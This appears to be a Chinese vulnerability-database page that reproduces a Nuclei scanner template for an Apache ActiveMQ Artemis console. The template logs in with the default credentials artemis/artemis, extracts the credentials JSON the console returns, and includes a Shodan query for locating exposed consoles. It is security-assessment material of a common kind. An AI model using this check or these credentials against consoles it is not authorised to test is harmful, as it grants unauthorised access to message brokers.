activemq-artemis-default-login: Apache ActiveMQ Artemis Console Default Login

日期: 2025-08-01 | 影响软件: Apache ActiveMQ Artemis | POC: 已公开

漏洞描述

Apache ActiveMQ Artemis console default login credentials were discovered.

PoC代码[已公开]

id: activemq-artemis-default-login

info:
  name: Apache ActiveMQ Artemis Console Default Login
  author: pdteam
  severity: high
  description: Apache ActiveMQ Artemis console default login credentials were discovered.
  reference:
    - https://activemq.apache.org/components/artemis/documentation/latest/management-console.html
  metadata:
    max-request: 2
    vendor: apache
    product: activemq
    shodan-query: title:"ActiveMQ Artemis Console"
  tags: apache,activemq,artemis,default-login,vuln

http:
  - method: POST
    path:
      - '{{BaseURL}}/console/auth/login'
    headers:
      Content-Type: application/json
    body: |-
      {"username":"{{username}}","password":"{{password}}"}

    stop-at-first-match: true
    payloads:
      username:
        - artemis
      password:
        - artemis
    attack: pitchfork
    matchers:
      - type: word
        words:
          - '{"credentials"'
    extractors:
      - type: regex
        name: credential
        part: body
        group: 0
        regex:
          - '{"credentials":.*}'
# digest: 4b0a00483046022100e0faa2a9ed6d17890a5baff4689de6883888068021a3a41c2b062a27649495b5022100e35163585784099683dc1dcd5f64e17230a94910d4bea3ca07ff85ad21803cef:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/activemq/activemq-artemis-default-login.yaml

相关漏洞推荐